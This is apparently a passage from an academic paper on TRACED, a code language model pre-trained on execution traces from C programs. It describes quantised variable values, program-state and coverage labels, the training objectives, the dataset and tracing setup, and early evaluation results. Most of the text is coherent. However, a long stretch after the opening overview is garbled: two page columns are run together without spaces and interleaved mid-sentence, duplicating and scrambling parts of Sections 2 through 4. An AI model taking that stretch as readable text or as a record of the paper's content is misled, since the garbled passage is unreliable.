- We will publicly release our data, code, and pre-trained models to foster open science.

2 OVERVIEW

Figure 2 shows the overview of TRACED, consisting of three main stages: (1) tracing the source code and engineering the features, (2) execution-aware pre-training using the program traces, and (3) loading the pre-trained weights and performing task-specific fine-tuning.

Figure 2: Overview of TRACED workflow.

Stage-1: Tracing & Feature Engineering. The goal of this stage is to prepare the data for pre-training. The process begins with a source program and its executable inputs. The first step is to execute the program with each input to generate corresponding traces. The traces record the runtime variable values together with the execution coverage, logging the full execution history of the program and revealing the changes to program states throughout execution. To reduce the complexity and sparsity of the data, and to make it easier for the model to learn patterns and relationships between the variable values, we quantize the concrete runtime values recorded in the traces into pre-defined value ranges. The quantization process maps continuous values to a fixed set of discrete bins. By quantizing the values, we create a finite set of possible outputs that can be used as ground-truth labels during training. After quantization, we create program state labels and execution coverage labels that will help the model to capture the program executions. The dataset finally ends up with a set of samples and labels, where each sample includes the source code with its program input and the labels represent the execution trace of that sample.
Whiletheruntimevariablevaluesaretraced asconcretevalues,directlylearningthembroughtchallengesto 2 OVERVIEW machinelearningmodels.Concretevaluesspanoverawiderange ofpossiblevalues,especiallywhenconsideringdifferentdatatypes Figure2showstheoverviewof TRACED,consistingofthreemain (integers,floating-pointnumbers,arrays,pointers,etc.),leading stages:(1)tracingthesourcecodeandengineeringthefeatures, toahigh-dimensional,complex,butsparsedatadistribution.This (2) execution-aware pre-training using the program traces, and increaseddatacomplexityandsparsitychallengesthemodelto (3)loadingthepre-trainedweightsandperformingtask-specific learnpatternsandrelationshipsbetweenthevariablevalues,asit fine-tuning. mustdealwithmanyuniqueinputs,whichcausesthemodelto Stage-1:Tracing&FeatureEngineering. Thegoalofthisstage overfitandmemorizespecificinstancesratherthangeneralizeto istopreparethedataforpre-training.Theprocessbeginswithpro- broaderpatterns.Additionally,noise,outliers,andirregularitiesof vidingasourceprogramanditsexecutableinputs.Thefirststepis concretevaluesalsomisleadthemodel’slearningprocess.Wewill toexecutetheprogramwitheachinputtogeneratecorresponding empiricallydemonstratetheselimitationsin§6.3. traces.Thetracesrecordtheruntimevariablevalues,togetherwith Todecreasethedatacomplexityandincreasethedensity,we theexecutioncoverage,loggingthefullexecutionhistoryofthe definethirtyvaluecategories,coveringawiderangeofvariable programandrevealingthechangestoprogramstatesthroughout types,tomapthecontinuousbutsparsevariablevaluesintodiscrete execution.Toreducethecomplexityandsparsityofthedata,and
bins.Wecallthisprocessasvaluequantization,whichissimilarin makeiteasierforthemodeltolearnpatternsandrelationshipsbe- designtothequantizationinsignalprocessing1.Thissimplification tweenthevariablevalues,wequantizetheconcreteruntimevalues potentiallyhelpsthemodeltobemoreresilienttonoiseandoutliers, recordedinthetracesintopre-definedvalueranges.Thequanti- allowingittofocusonlearningtheunderlyingexecutionpatterns zationprocessmapscontinuousvaluestoafixedsetofdiscrete andrelationshipsbetweenvariables,ratherthanbeingsensitiveto orbins.Byquantizingthevalues,wecreateafinitesetofpossible specificinstancesorirregularities. outputsthatcanbeusedasground-truthlabelsduringtraining. 1https://en.wikipedia.org/wiki/Quantization_(signal_processing) Afterquantization,wecreateprogramstatelabelsandexecutionTRACED:Execution-awarePre-trainingforSourceCode ICSE2024,April2024,Lisbon,Portugal 3 TRACING&FEATUREENGINEERING Inthissection,weintroducehowTRACEDbuildsthelearnable featuresfromprogramtracesformodelstolearntheprogramexe- cutions. 3.1 RepresentingProgramStates Toimitatethewaythathumandevelopersmonitorvariablevalues tounderstandprogrambehavior,weproposetotrainneuralmodels with the log of runtime variable values to recognize execution patternsandinferdynamicprogrambehaviorsinawaythatis similartohumanintuition.Bytakingthelogofvariablevalues duringtheexecution,wecanrepresenttheprogramstatesina morecompactandinterpretableformthatismanageablefordeep neuralnetstoprocess. Webuildtheprogramstatebytakingsnapshotsofvariablevalues atprogrampointsduringexecution.Whenwetakeasnapshotata Figure2:OverviewofTRACEDworkflow. specifictimestep,similartothemomentthattheprogramispaused coveragelabelsthatwillhelpthemodeltocapturetheprogram byadebuggingbreakpointsetrightafterline𝑙,wemaintainavalue executions.Thedatasetfinallyendsupwithasetofsamplesand mapping,𝑀,tomapthevariabletoitscurrentvalue,similartothe labels,whereeachsampleincludesthesourcecodewithitsprogram valuemappingtableofthedebugger.Torecordtheprogramstate, inputandthelabelsrepresenttheexecutiontraceofthissample. wetakethevaluesnapshotaftereachlineofexecutionandlogthe variables’currentvalues. Stage-2:Execution-awarePre-trainingwithTraces. Weuti- Definition:ProgramState.Formally,wedefinetheprogramstate lizethepre-processedsamplesandlabelsobtainedfromStage-1to aftertheexecutionofaspecificline,𝑙,as𝑠(𝑙),representedasaset performsupervisedpre-training.Specifically,weuseaTransformer- ofvariablevaluesatthismoment: encoder-basedmodel[31]tolearntheprogramtracesandimprove themodel’sunderstandingofprogramexecution.Themodelcould 𝑠(𝑙)={𝑀(𝑣,𝑙) |𝑣 ∈𝑉, 𝑙 ∈𝐿} beeithertrainedfromscratchorloadedbythepre-trainedweights 𝑉 representsthesetofalltracedvariables,and𝐿isthesetof ofexistingcodelanguagemodels.Toachievethegoalofproduc- lineswithsourcecode.Figure3showsanillustrativeexampleofa ingexecution-awarecoderepresentation,weproposethreepre- simplefactorialprogramandthecommentsafterthesourcecode trainingobjectives.Thefirstobjectiveislearningtogeneratethe indicatetheprogramstateaftertheexecutionofthatline.Also, sourcecode.Webelievethatunderstandingthenaturalnessofcode wedonotlogtheprogramstateforlineswithoutexecutablecode, text[20,43]isfundamentalforthemodeltocapturemoresophisti- suchasline-8ofFigure3. catedsignalssuchasprogramexecution.Thisobjectiveisimple- mentedwithmaskedlanguagemodeling(MLM),whichmasksa 1 // INPUT: 4 certainpercentageoftokensinthesourcecodeandtrainsthemodel 2 int factorial() { toreconstructthemaskedtokensbasedonthesurroundingcontext. 
3 int x, y; // {'x': 32767, 'y': 32767} Thesecondobjectiveislearningtopredicttheprogramstates.By 4 x = atoi(argv[1]); // {'x': 4, 'y': 32767} 5 if (x < 0) { // {'x': 4, 'y': 32767} predictingprogramstatelabelsthatweregeneratedinStage-1,the 6 y = -1; modellearnstocapturethedataflowsandthesideeffectsofcode 7 return y; execution.Thethirdobjectiveistopredicttheexecutioncoverage. 8 } BypredictingtheexecutioncoveragelabelsgeneratedbyStage-1, 9 y = 1; // {'x': 4, 'y': 1} themodellearnstocapturethedynamiccontrolflowandhelpsthe 10 for (int i = 1; i <= x; i++) // {'x': 4, 'y': 24, 'i': 5} 11 { modelunderstandhowtheprogramstateisreachedandevolving. 12 y *= i; // {'x': 4, 'y': 24, 'i': 5} 13 } 14 return y; // {'x': 4, 'y': 24, 'i': 5} Stage-3:Task-specificFine-tuning. Finally,weapplyTRACED 15 } toseveraldownstreamtasks.Weloadthepre-trainedweightsof TRACED,fine-tunethemodelforaspecifictask,andkeepupdating Figure3:Programstateswithconcreteruntimevalues. themodelweights.Fine-tuningdoesnotrequiretheprogramtobe executed;rather,TRACEDwillreasonabouttheexecutionstatically Notethatasourcecodelinecouldbeexecutedmultipletimesdue withitslearnedexecutionsignalsduringthepre-training,andlearn toalooporrecursion.Whileamoredetailedrepresentationofpro-
toaccomplishthetaskaccordingly.Inmanyusefulapplications, gramexecutionmightprovideadditionalinsights,italsoincreases wewouldnothaveprogramtracesavailable.Weconsiderthree thecomplexityandcomputationalrequirementsofthemodel.Asa downstreamtasksforTRACED:staticexecutionestimation,which trade-offbetweenthecomplexityandperformance,weusethelast includesexecutioncoverageandruntimevariablevaluepredictions, occurringexecutionofeachlinetofinalizetheprogramstates,so cloneretrieval,andvulnerabilitydetection. that𝑠(𝑙)keepsgettingupdateduntiltheexecutionterminates.ICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay Weapplysuchatrade-offbasedontheobservationsofrealexecu- Toreducethedatacomplexityandincreasethedensity,wedefine tions.Specifically,thelastoccurringvaluesaretypicallysufficient 30categoriesforquantizedvaluesinTable1.Tocomprehensively tocapturetheresultsofloopsandrecursions.Forexample,when representthevariablevalues,theproposedquantizedcategories callingarecursivefunction,onlythelastoccurringvalue(s)ofre- considerbothtypes,i.e.,thedatatypesandvaluetypes,thatare turnedvariable(s)willbetakentofulfillthefollowingexecutionof staticallydefined,andthedynamicruntimevalues.Ourquantized thecaller.Similarly,thefinalvalueswhenloopsfinishwilltakepart categoriescoverthemostcommonvariabletypesandvaluetypes, inthefutureexecution.Asshowninline-12ofFigure3,variable whichwehavefoundsufficienttocaptureimportantprogramex- ygetsmultipliedinsidealooptocalculatethefactorial.Itsvalue ecutionbehaviorsandrelationships.Byfocusingonthemostfre- changesineachiteration,butitislessinformativetoreasonabout quentvaluetypes,wecancapturetheessentialfeaturesofprogram theprogram’soverallbehavior,asonlythefinalvalueisusedas execution.Thismakesourapproacheffectiveatcapturingthegen- thereturnvalue(line-14).Thus,wewouldrepresentyusingthe eralizedprogramexecutionbehaviorsandpatterns.Weempirically valuefromthelastoccurringexecutionoftheloop. illustrateourquantizationstrategy’seffectivenessin§6.3. 3.3 BuildingLearnableLabelsforCodeModels 3.2 QuantizedVariableValues Weusedsupervisedpre-trainingwithtraces.Weconstructlabelsfor Asweintroducedin§1,thedistributionofconcretevaluesissparse codemodelstolearntwomainperspectivesofexecution:program andcomplex,consequentlydifficultforastatisticalmodeltofit.In statesandexecutioncoverage. addition,concretevaluesarenotalwaysnecessary.Somecommon programbehaviorsareaccompaniedbyextremelylargeorsmall ProgramStateLabels. Aswediscussedinprevioussections, variablevalues–forexample,inC,uninitializedvariablesareoften wefirsttracetheprogramvariablesduringexecutionandlogtheir settozerooruncommonlylargevariables,buttheconcretevalues runtimevalues.Wethenquantizethesevaluesintopre-defined arenotmeaningfulbecausetheydependonlyonthedataremaining categories.Thisprocessresultsinasequenceofprogramstates, onthestack,whichcouldberandomlylargeorsmall.Themodel eachrepresentedbyasetofquantizedvariablevalues(asshownin couldrepresentsuchbehaviorsbyestimatingthevaluerangesof Figure3),andwebuildthelearnablefeaturesforthecodemodelon variableswithoutaccuratelypredictingtheirconcretevalueswhich topoftheseprogramstates.Specifically,webuildlabelsforvariables arenotinformativeormeaningful.Figure3displayssomeofthese thatcanbequantizedintoTable1’scategoriesandtrainthemodelto cases:aftertheexecutionofline-3,xandyareuninitializedand predicttheselabelsgiventheirsourcecoderepresentations(§4.1.2). 
3.2 Quantized Variable Values

As we introduced in Section 1, the distribution of concrete values is sparse and complex, and consequently difficult for a statistical model to fit. In addition, concrete values are not always necessary. Some common program behaviors are accompanied by extremely large or small variable values. For example, in C, uninitialized variables are often set to zero or to uncommonly large values, but the concrete values are not meaningful because they depend only on the data remaining on the stack, which could be randomly large or small. The model can represent such behaviors by estimating the value ranges of variables without accurately predicting concrete values that are not informative or meaningful. Figure 3 displays some of these cases: after the execution of line-3, x and y are uninitialized and randomly initiated as 32,767, which has no concrete meaning but only makes the training data noisy and sparse.

To reduce the data complexity and increase the density, we define 30 categories for quantized values in Table 1. To comprehensively represent the variable values, the proposed quantized categories consider both the types, i.e., the data types and value types that are statically defined, and the dynamic runtime values. Our quantized categories cover the most common variable types and value types, which we have found sufficient to capture important program execution behaviors and relationships. By focusing on the most frequent value types, we can capture the essential features of program execution. This makes our approach effective at capturing generalized program execution behaviors and patterns. We empirically illustrate our quantization strategy's effectiveness in Section 6.3.

Table 1: TRACED's design of quantized variable values.

Data Type | Value Type | Concrete Value | Quantized Value
Basic | Integer | 0 < v <= 10,000 | Positive Regular
Basic | Integer | 10,000 < v | Positive Large
Basic | Integer | 0 | Zero
Basic | Integer | -10,000 <= v < 0 | Negative Regular
Basic | Integer | v < -10,000 | Negative Large
Basic | Float/Double | 0.0 < v <= 1.0 | Positive Small
Basic | Float/Double | 1.0 < v <= 10,000.0 | Positive Regular
Basic | Float/Double | 10,000.0 < v | Positive Large
Basic | Float/Double | 0.0 | Zero
Basic | Float/Double | -1.0 < v < 0 | Negative Small
Basic | Float/Double | -10,000.0 <= v < -1.0 | Negative Regular
Basic | Float/Double | v < -10,000.0 | Negative Large
Basic | Character | '\0' | Null
Basic | Character | v in {a-zA-Z} | Alphabetic
Basic | Character | v != '\0' and v not in {a-zA-Z} | Non-alphabetic
Basic | Boolean | 0 | False
Basic | Boolean | 1 | True
Basic | Void | - | Void
Array | Integer | [v1, v2, ..., vn]; quantize(vi) in Integer | Initialized / Not Initialized
Array | Float/Double | [v1, v2, ..., vn]; quantize(vi) in Float/Double | Initialized / Not Initialized
Array | Character | "<string>" | Initialized / Not Initialized
Pointer | Integer | 0x0 / not 0x0 | Null / Not Null
Pointer | Float/Double | 0x0 / not 0x0 | Null / Not Null
Pointer | Character | 0x0 / not 0x0 | Null / Not Null
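As a concrete illustration of the binning in Table 1, the following C sketch maps runtime values of basic integers and characters to their quantized categories (the helper names are ours; the paper does not publish its quantization code):

#include <stdio.h>

/* Map a concrete integer to its quantized category from Table 1. */
const char *quantize_int(long v) {
    if (v == 0)      return "Zero";
    if (v > 10000)   return "Positive Large";
    if (v > 0)       return "Positive Regular";
    if (v >= -10000) return "Negative Regular";
    return "Negative Large";
}

/* Map a concrete character to its quantized category from Table 1. */
const char *quantize_char(char c) {
    if (c == '\0') return "Null";
    if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')) return "Alphabetic";
    return "Non-alphabetic";
}

int main(void) {
    printf("%s\n", quantize_int(32767));  /* Positive Large, as in Figure 3 */
    printf("%s\n", quantize_char('x'));   /* Alphabetic */
    return 0;
}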
3.3 Building Learnable Labels for Code Models

We use supervised pre-training with traces. We construct labels for code models to learn two main perspectives of execution: program states and execution coverage.

Program State Labels. As discussed in the previous sections, we first trace the program variables during execution and log their runtime values. We then quantize these values into pre-defined categories. This process results in a sequence of program states, each represented by a set of quantized variable values (as shown in Figure 3), and we build the learnable features for the code model on top of these program states. Specifically, we build labels for variables that can be quantized into Table 1's categories and train the model to predict these labels given their source code representations (Section 4.1.2). The label for each variable is represented as a tuple: (data type, value type, quantized value). For example, in Figure 3, the label of variable x occurring at line-3 is (Basic, Integer, Positive Large), as the current value of x is 32,767. We build such labels for all occurrences of valid variables that can be quantized, and the set combining all labels is considered the program state labels of the code sample.

Execution Coverage Labels. To unify our design and reduce the complexity of the model's learning process, we also build execution coverage labels for each occurrence of variables, aligning with the program state labels. Specifically, we represent the coverage of a variable with a binary label, "Yes" or "No". Variables within an executed line are labeled "Yes", while those within unexecuted lines are labeled "No" and further assigned an "Unknown" quantized value, while retaining their labels for data type and value type. For example, in Figure 3, line-6 is not executed, so y at this line has the coverage label "No" and the program state label (Basic, Integer, Unknown), while y at line-9 has the coverage label "Yes" and the program state label (Basic, Integer, Positive Regular).

4 MODEL

In this section, we explain the details of TRACED's components and the learning objectives during pre-training and fine-tuning.

Model Architecture. Figure 4 shows the high-level architecture of TRACED's pre-training. The backbone of TRACED is a 12-layer Transformer encoder, similar to BERT [9] and RoBERTa [31], which learns the generic code representations. On top of the backbone Transformer layers, TRACED stacks multiple multi-layer-perceptron (MLP) layers as prediction heads for different tasks. During the pre-training, as shown in Figure 4, TRACED applies a language model prediction head, i.e., the LM layer, to predict the masked token given its contextualized representation, a program state prediction head to predict the program state labels defined in Section 3.3, and an execution coverage head to predict the execution coverage labels. For the task-specific fine-tuning, the backbone Transformer layers are loaded with the pre-trained weights, while the prediction heads are replaced by a newly initialized head customized for the specific downstream task.

Figure 4: High-level model architecture of TRACED. In the labels for program state layers, NEG_REG means "Negative Regular", UNK means "Unknown", and POS_REG means "Positive Regular", as defined in Table 1.

4.1 Execution-aware Pre-training

4.1.1 Model Input of Pre-training. Each pre-training sample includes the source code of an executable program and a valid executable input. As shown in Figure 4, the executable input and the source code are flattened and concatenated into one sequence. To distinguish the input from the source code, as they are different modalities, TRACED uses special [SEP] tokens to separate them and indicate individual positions. To alleviate the out-of-vocabulary concern of programming languages [25], TRACED takes a pre-trained SentencePiece [28] subword tokenizer with a vocabulary size of 50,000 and uses it to divide the concatenated sequence into a new sequence of sub-tokens.

Formally, we define the executable inputs as $E = \{e_1, ..., e_i\}$ and the flattened source code as $C = \{c_1, ..., c_j\}$; the final model input is $I = \{[CLS], e_1, ..., e_i, [SEP], [SEP], c_1, ..., c_j, [SEP]\}$. TRACED truncates the executable inputs and the source code separately if they are too long, setting the maximum length of the executable input sequence to 64 tokens and of the source code to 960 tokens. These numbers are selected based on the statistics of executable inputs' length in our pre-training dataset (Section 5.2.1), and fit the rest of the model input with source code. Note that the execution traces are not part of the model input; they are used as ground-truth labels for the model to predict during pre-training.

4.1.2 Learning Execution-aware Code Representations with Traces. TRACED is pre-trained with multiple objectives to jointly capture the static and dynamic perspectives of the source code.

Learning Code Text. Learning code text is the essential first step toward understanding the execution of a program, as code text is the primary source for capturing the code naturalness [20] and other static properties. We implement the code text learning objective by adapting the masked language model objective [9, 16, 31]. Specifically, given the model input sequence $I$, TRACED randomly chooses 15% of tokens [9, 31] only from the source code sequence $C$ and replaces them with the special [MASK] token (e.g., printf in Figure 4 is masked). It leaves the executable input sequence $E$ as is. The model is trained to encode the context of [MASK] into its code representation, $r_{masked}$, and reconstruct the concrete masked tokens conditioned on the representation. We represent the loss of learning code text as:

$\mathcal{L}_{code\text{-}text} = \sum_{masked} -\log P(c_{masked} \mid r_{masked})$  (1)

In Figure 4, the LM (Language Model) layer receives the masked token representation generated by the last Transformer layer. The LM layer then predicts the concrete tokens by mapping the token representation to a probability over the vocabulary, using an MLP (Multi-Layer Perceptron) layer. This process can be thought of as a classification task where the number of classes equals the size of the vocabulary. The goal is to learn a mapping from the masked token representation to the most probable token in the vocabulary, given its context.
Learning Program States. The second pre-training objective, program state prediction (PSP), is designed to enable the model to learn program execution behavior by predicting the program state labels of the traced variables. These program state labels, as defined in Section 3.3, contain information about the data types, value types, and quantized values of the variables at the end of the program execution. Specifically, TRACED first identifies the variable tokens in the source code sequence, denoted as $\{c_{var} \mid c_{var} \in V\} \subseteq C$, where $V$ is the set of all traced variables and $C$ is the source code sequence. It then extracts the representation, $r_{var}$, of each variable token and feeds it into the program state layer. The program state layer predicts the variable's joint likelihood of being the ground-truth data type, $d_{var}$, value type, $t_{var}$, and quantized value, $q_{var}$. Note that if a variable is tokenized into multiple sub-tokens, all of its sub-tokens share the same program state label. Finally, TRACED computes the loss of PSP as the sum of the losses of all variable tokens used for predicting their program states:

$\mathcal{L}_{program\text{-}state} = \sum_{var} -\log P(d_{var}, t_{var}, q_{var} \mid r_{var})$  (2)

Learning Variable Coverage. The third pre-training objective, variable coverage prediction (VCP), aims to learn the execution coverage, which is crucial for understanding the control flow of the code given a specific input. Similar to the PSP objective, VCP makes predictions for variable tokens. The label of variable coverage is binary, where 1 means the line this variable belongs to is covered, and 0 otherwise. Sub-tokens belonging to the same variable are assigned the same coverage label. The loss of VCP is:

$\mathcal{L}_{var\text{-}cov} = \sum_{var} -\log P(cov_{var} \mid r_{var})$  (3)

Finally, TRACED combines the losses of all three objectives and computes their sum as the final loss of a pre-training sample. It back-propagates the gradients through both the prediction layers and the backbone Transformer layers to update their weights. We denote the full set of TRACED's learnable parameters as $\theta$ and represent the loss as:

$\mathcal{L}(\theta) = \mathcal{L}_{code\text{-}text}(\theta) + \mathcal{L}_{program\text{-}state}(\theta) + \mathcal{L}_{var\text{-}cov}(\theta)$  (4)

4.2 Task-specific Fine-tuning

TRACED loads the weights of the Transformer layers, which are pre-trained to produce execution-aware code representations, and further fine-tunes the model for downstream tasks. We consider three downstream tasks as the main applications for TRACED: (1) static estimation of program execution, which includes both execution coverage prediction and runtime variable value prediction; (2) semantic clone retrieval; (3) vulnerability detection.
Static Execution Estimation. Our goal of pre-training is to encode the execution patterns into the code representation, so the model can estimate the program execution statically. As a direct application, TRACED fine-tunes the model to predict (1) the execution coverage and (2) runtime variable values using source code and program input, and evaluates the fine-tuned model by estimating the execution of unseen programs in the same way. Specifically, for execution coverage prediction, TRACED identifies all the branching statements to locate the branches, $B = \{b_1, b_2, ..., b_m\}$, within the source code. It trains the model to predict a binary label for each $b_i \in B$, where 0 means the branch is not covered by the current execution and 1 means it is covered. For the model's convenience in making predictions, the special token [MASK] is inserted at the beginning of each branch. For example, the following if-else has two branches pre-processed for branch prediction: if (condition) {[MASK] ...} else {[MASK] ...}. During fine-tuning, the Transformer layers learn to encode the branch information into the corresponding [MASK] token representation with the built-in bi-directional attention and positional encoding. The classification head then takes the [MASK] representations to predict whether a branch is covered by the current execution. For variable value prediction, TRACED identifies the variables, $V = \{v_1, v_2, ..., v_n\}$, and trains the model to predict their quantized values (Section 3.2) during the execution.

Semantic Clone Retrieval. Detecting semantic clones is significant for software maintenance [26, 30], yet very challenging in practice, since the token and syntactic structure overlap among semantic clones may be quite limited. This task requires the model to estimate program behaviors without executing the programs and to capture the similarity among them. It evaluates the model's semantic reasoning capacity to identify code similarity and retrieve clones: given a program as a query and an arbitrary collection of programs as candidates, the model needs to identify the query's semantic clones from possibly thousands of candidates.

Vulnerability Detection. Vulnerability detection is a crucial task in software security, aiming to identify potential security vulnerabilities in software code that could be exploited by attackers. The vulnerabilities may exist for various reasons, including programming errors, design flaws, or configuration issues. Detecting these vulnerabilities early in the software development lifecycle can prevent potential attacks, mitigate risks, and save resources. We fine-tune TRACED's pre-trained model on datasets consisting of vulnerable and non-vulnerable code samples, so the model learns to classify code functions as vulnerable or non-vulnerable by estimating their execution behavior.

5 EXPERIMENTAL SETUP

5.1 Trace Collection

In this section, we explain how we traced the dynamic information in programs to produce concrete traces, given the source code and program input.

First, we compile the program using gcc with the options -g -O0. Option -g preserves debug information, which is necessary in order to read variables and source code locations using the debugger, and option -O0 disables compiler optimizations, which could optimize out some variables and thus prevent them from being read at runtime. We use this option because we seek to model the semantics of the source code in terms of variable values rather than the optimized machine code.

Second, we load the program with the given standard input redirected to stdin and attach the gdb debugger (https://www.sourceware.org/gdb), using its Python API to implement the tracing command. Starting from the entry point (main), we execute the program one line at a time using the step command. At each line, we print out the concrete values of all variables in scope. We also set breakpoints at the entry of each user-defined function, where we log the values of each parameter. For numeric types, we simply log their string representation. For char and char * (string) types, we log the human-readable values of the chars/strings. We use gdb's pretty-printer to print struct types and statically allocated array types, such as int[<size>]. For pointer types, we print the memory address of the pointer as a hex code. We only traced the functions that were defined in the source code and skipped over all standard library functions.
5.2 Dataset

5.2.1 Pre-training Dataset. IBM's CodeNet Dataset [41] includes 4,053 programming challenges for several programming languages from the AIZU Online Judge and AtCoder platforms, and each problem has up to thousands of implementations submitted by distinct programmers. In this work, we focus on the C language as the main resource for the pre-training and downstream tasks, so we build our pre-training dataset with programming challenges that have C solutions. Besides the large number of samples and the complexity of the programming challenges, we choose CodeNet because it maintains at least one and at most twenty executable inputs for each challenge, so we can execute and trace the implementations of each challenge and consequently build our execution labels for the model to learn.

Out of 1,900 programming challenges with C solutions, we select 1,805 to build the pre-training dataset and leave the other 95 problems as held-out problems for evaluating the model's capacity on the downstream static execution estimation task. Splitting samples strictly by challenge effectively avoids data leakage from the training set to the held-out set. We randomly sample up to 200 execution traces for each challenge, which ends up with 121,319 training traces.

5.2.2 Downstream tasks. In this section, we introduce the datasets we use for each downstream task and explain the corresponding evaluation metrics. The statistics of these datasets are in Table 2.

Static Execution Estimation. We build the dataset for this task using CodeNet. We build the training samples from the 1,805 challenges selected for pre-training, and build evaluation samples from the held-out 95 challenges to avoid model memorization and data leakage.

Metrics. For the execution coverage prediction, we consider evaluation metrics at two granularities: full execution path and branch coverage. Concretely, for a sample with $m$ branches, we denote the full set of their labels as $LB = \{lb_1, lb_2, ..., lb_m\}$ and the model prediction set as $\hat{LB} = \{\hat{lb}_1, \hat{lb}_2, ..., \hat{lb}_m\}$. If $LB == \hat{LB}$, we regard the prediction as matching the full execution path. For the branch coverage, we compute the occurrence of $lb_i == \hat{lb}_i$, where $1 \le i \le m$, and report the accuracy, precision, recall, and F1. Similarly, for the $n$ quantized variable values within the program, $QV = \{qv_1, qv_2, ..., qv_n\}$, our model makes predictions $\hat{QV} = \{\hat{qv}_1, \hat{qv}_2, ..., \hat{qv}_n\}$. If $QV == \hat{QV}$, we say the model accurately predicts the full execution. For the individual value match, we compute the occurrence of $qv_i == \hat{qv}_i$ and report the accuracy.

Semantic Clone Retrieval. We use CodeXGLUE-POJ104 [32, 33] as the dataset for this task. CodeXGLUE-POJ104 contains 104 programming challenges, each with 500 C/C++ solutions submitted by different programmers. CodeXGLUE [32] reconstructs it as a public benchmark by splitting the dataset into Train (64 challenges), Dev (16 challenges), and Test (24 challenges) sets, with no overlapping challenge between any two sets.

Metrics. MAP@R (Mean Average Precision @ R) is the main metric of this task, where we follow the design of the CodeXGLUE benchmark. Average precision at R is a common metric to evaluate the quality of information retrieval; it measures the average precision scores of a set of the top-R clone candidates presented in response to a query program. The R for CodeXGLUE is 499, as there are 500 solutions for each challenge.

Vulnerability Detection. We utilize three publicly available datasets: REVEAL (RV) [8], D2A [53], and CodeXGLUE-Devign (CXG) [32, 54]. The REVEAL dataset was curated by Chakraborty et al. to simulate a real-world scenario where bugs are relatively rare, resulting in a ratio of approximately 1:10 between buggy and benign samples. The D2A dataset is a balanced dataset focusing on bug-fixing commits. It labels the previous version of modified functions as buggy and the fixed version as benign. Finally, the CodeXGLUE-Devign dataset, introduced by Zhou et al., is also a balanced dataset that has been reconstructed as a public benchmark by CodeXGLUE, ensuring that all models can be evaluated using the same train/valid/test splits.

Metrics. REVEAL is an imbalanced dataset, so we use F1 as the evaluation metric. D2A and Devign are balanced datasets, so we follow the original benchmarks and report classification accuracy.

Table 2: Details of downstream task datasets.

Task | Dataset | Train | Valid | Test
Execution Estimation | CodeNet | 121,319 | 13,116 | 13,116
Clone Detection | CXG-POJ104 | 32,000 | 8,000 | 12,000
Vulnerability Detection | REVEAL | 15,867 | 2,268 | 4,535
Vulnerability Detection | D2A | 4,644 | 597 | 619
Vulnerability Detection | CXG-Devign | 21,854 | 2,732 | 2,732

5.3 Model Configuration

TRACED's backbone is a standard RoBERTa-BASE architecture [31] with 12 Transformer-encoder layers; each layer has 12 attention heads, and the hidden dimension is 768. TRACED is initialized with the pre-trained weights of UnixCoder [17] (specifically, unixcoder-base-nine, as its pre-training considers C-language code samples: https://huggingface.co/microsoft/unixcoder-base-nine; note that this checkpoint is pre-trained only with the MLM objective, while the original paper [17] reports other better-performing variants that are not released publicly), and we use its BPE tokenizer to split rare tokens into BPE sub-tokens. The maximum sequence length is 1,024 BPE tokens, and longer sequences are truncated. When a code sample is paired with executable inputs, the maximum length for the executable input is 64 tokens and for the source code 960 tokens. Our experiments are conducted on 2x24GB NVIDIA GeForce RTX-3090 GPUs. We further pre-train the model for 10 epochs to learn the program execution with two learning rates, 5e-5 and 2e-5, and report the best-performing models for downstream tasks. For all fine-tuning tasks, we use a learning rate of 8e-6. Learning rates typically decrease for later phases [10, 16, 18], so TRACED follows the same design. We use the Adam optimizer [27] with linear learning rate decay. Our model is implemented mainly with PyTorch [12] and Huggingface [14].

6 EVALUATION

In this section, we ask the following four RQs:

- RQ1: How effective is TRACED in statically estimating the program execution?
- RQ2: How does our proposed training strategy contribute to learning the program execution?
- RQ3: Are our proposed quantized values for programs effective in guiding the model to learn program executions?
- RQ4: How does TRACED perform w.r.t. statically pre-trained baselines for code understanding tasks?
6.1 RQ1. Effectiveness of TRACED in Static Estimation of Execution

In this section, we demonstrate the effectiveness of TRACED in statically estimating program execution. The evaluation is more challenging and realistic than TRACED's pre-training, as it requires the model to predict not only individual variables but also branches and the full execution path.

Baseline. In this RQ, we mainly compare the execution-aware TRACED with UnixCoder [17], for the following reasons. First, TRACED is initialized with the pre-trained UnixCoder weights, so comparing TRACED with UnixCoder's performance is a direct assessment of the impact of our proposed pre-training. Second, UnixCoder reports state-of-the-art performance in many tasks, including clone detection, code search and summarization, and code generation and completion, significantly outperforming other pre-trained code models such as CodeBERT [16] and GraphCodeBERT [18]. Third, it consumes up to 1,024 tokens, while most pre-trained code models [1, 6, 16, 18, 49] take at most 512 tokens. By consuming longer sequences, UnixCoder is able to handle longer programs and make complete predictions without truncating code in many cases. As TRACED is also designed to consume 1,024 tokens, it would not be fair to compare it on this task with baselines limited to 512 tokens, as those baselines would necessarily consider fewer branches for prediction.

Table 3: Performance on static execution estimation.

Model | Coverage: Full Path Acc | Branch Acc | Branch Prec | Branch Rec | Branch F1 | Runtime Value: Full Exec Acc | Var Acc
UnixCoder | 63.7 | 79.7 | 81.7 | 85.4 | 83.5 | 39.3 | 87.8
TRACED | 71.6 | 83.1 | 84.6 | 88.1 | 86.3 | 49.2 | 89.2
- w/o MLM | 70.4 | 82.6 | 85.3 | 86.0 | 85.6 | 49.0 | 89.2
- w/o PSP | 69.0 | 81.4 | 83.0 | 86.9 | 84.9 | 44.0 | 87.4
- w/o VCP | 66.1 | 80.3 | 82.4 | 85.6 | 84.0 | 46.7 | 89.0
- MLM-only | 65.6 | 81.0 | 83.1 | 86.0 | 84.6 | 43.0 | 87.5

Result. The comparison is shown in Table 3, Row-1 vs. Row-2. TRACED significantly outperforms UnixCoder in the static estimation of execution coverage and dynamic variable values, especially when the evaluation granularity is coarse, i.e., the full execution path (Full Path column in Table 3) and the runtime values of the full execution (Full Exec column in Table 3). TRACED correctly predicts the complete execution paths for 71.6% of held-out samples and accurately predicts all variable values for 49.2% of executions, revealing that the execution-aware pre-training improves over UnixCoder's performance by 12.4% and 25.2%, respectively.

